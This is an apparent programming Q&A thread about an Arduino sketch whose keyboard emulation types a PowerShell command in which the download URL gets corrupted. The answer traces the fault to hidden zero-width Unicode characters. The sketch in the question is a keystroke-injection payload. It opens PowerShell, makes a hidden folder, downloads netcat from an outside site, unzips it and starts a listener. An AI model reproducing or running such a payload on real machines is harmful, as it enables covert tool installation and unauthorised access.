# Why does Keyboard.Print adds random values to url?

Tags: programming, arduino-micro, keyboard, arduino-pro-micro, atmega32u4

I'm trying to print a sequence of power shell commands including a url to the powershell interpreter but every time I execute it with the Arduino Micro it adds random values to the url. Here's the normal print statement.

```
Keyboard.print("cd \"$HOME\"; $folder=mkdir \"Misc\"; $folder; $folder.Attributes= \"Hidden\"; $url=\"https://eternallybored.org/misc/netcat/netcat-win32-1.‌​11.zip\"; $output = \"$HOME\\Misc\\nc.zip\"; (New-Object System.Net.WebClient).DownloadFile($url,$output); $shell=New-Object -ComObject shell.application; $zip=$shell.NameSpace(\"$HOME\\Misc\\nc.zip\"); foreach ($item in $zip.items()) { $shell.NameSpace(\"$HOME\\Misc\").CopyHere($item)}; cd \"$HOME\\Misc\\netcat-1.11\"; & \"$HOME\\Misc\\netcat-1.11\\nc.exe\" -lp 4545 > incoming.txt "); 
    typeKey(KEY_RETURN);
```

I'm passing this link `https://eternallybored.org/misc/netcat/netcat-win32-1.‌​11.zip` to a variable called `$url` and here is the actual output when the command executes

```
  cd "$HOME"; $folder=mkdir "Misc"; $folder; $folder.Attributes= "Hidden"; $url="https://eternallybored.org/misc/netcat/netcat-win32-1.2a211.zip"; $output = "$HOME\Misc\nc.zip"; (New-Object System.Net.WebClient).DownloadFile($url,$output); $shell=New-Object -ComObject shell.application; $zip=$shell.NameSpace("$HOME\Misc\nc.zip"); foreach ($item in $zip.items()) { $shell.NameSpace("$HOME\Misc").CopyHere($item)
```

notice how the $url now has random values in them?

```
https://eternallybored.org/misc/netcat/netcat-win32-1.2a211.zip
```

Also If you try copying and pasting the url I posted above on a browser, the url doesn't work. But if you go to `https://eternallybored.org/misc/netcat/` and copy link location of `netcat 1.11` which is the same url and paste it. The url works...

I don't understand why this is happening any thoughts?

Full code

```
void typeKey(int key) {

  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */

void setup() {
  //Beging Keyboard Stream
  Keyboard.begin();
  delay(500);

  Keyboard.press(KEY_LEFT_GUI);
  delay(4000);
  Keyboard.press('r');
  delay(4000);

  Keyboard.releaseAll();

  delay(1000);

  Keyboard.print("powershell");

  typeKey(KEY_RETURN);

    delay(1000);
    Keyboard.print("cd \"$HOME\"; $folder=mkdir \"Misc\"; $folder; $folder.Attributes= \"Hidden\"; $url=\"https://eternallybored.org/misc/netcat/netcat-win32-1.‌​11.zip\"; $output = \"$HOME\\Misc\\nc.zip\"; (New-Object System.Net.WebClient).DownloadFile($url,$output); $shell=New-Object -ComObject shell.application; $zip=$shell.NameSpace(\"$HOME\\Misc\\nc.zip\"); foreach ($item in $zip.items()) { $shell.NameSpace(\"$HOME\\Misc\").CopyHere($item)}; cd \"$HOME\\Misc\\netcat-1.11\"; & \"$HOME\\Misc\\netcat-1.11\\nc.exe\" -lp 4545 > incoming.txt "); 
    typeKey(KEY_RETURN);

    Keyboard.end();
}
    void loop() {
    }
```

Comment: Presumably there's a problem. But since you don't provide your code or circuit, I doubt anyone will be able to divine what it is.

Comment: the code is in the question and that's all the program does prints that line. I guess I can add the init functions. @MarkSmith

Comment: Sorry, are you saying going to `https://eternallybored.org/misc/netcat/netcat-win32-1.‌​11.zip` in a browser works?

Comment: If you go to `https://eternallybored.org/misc/netcat` and copy link from netcat-1.11 the link is `https://eternallybored.org/misc/netcat/netcat-win32-1.‌​11.z‌​ip` and it works if I copy link and paste but if I don't copy link and just paste that link on the browser it does not work.

Answer (score 0, accepted):

You have some unicode characters in your URL. Remove them.

```
https://eternallybored.org/misc/netcat/netcat-win32-1.<200c>‌​<200b>11.zip 
                                                      ^^^^^^^^^^^^
```

Comment: I'm not the owner of the website, so that means I can't download the owners links with powershell?

Comment: @Francesc You misunderstand me. In **your** sketch. YOUR code. You have managed to add, somehow, some extra UNICODE characters.

Comment: in my sketch the URL is `https://eternallybored.org/misc/netcat/netcat-win32-1.‌​11.z‌​ip` when I execute my sketch I get a response with this `https://eternallybored.org/misc/netcat/netcat-win32-1.2a211.zip`

Comment: Yes, that is exactly what I am saying. Although you may not be able to notice it here. I suggest you go to view the source of this web page and look at precisely what you have just pasted into the comment box just now. You will plainly see the extra unicode characters there. You keep copying and pasting the SAME corrupted URL. If you want to fix it then delete the URL from your code and type it in by hand. DO NOT COPY AND PASTE AGAIN, IT IS CORRUPT!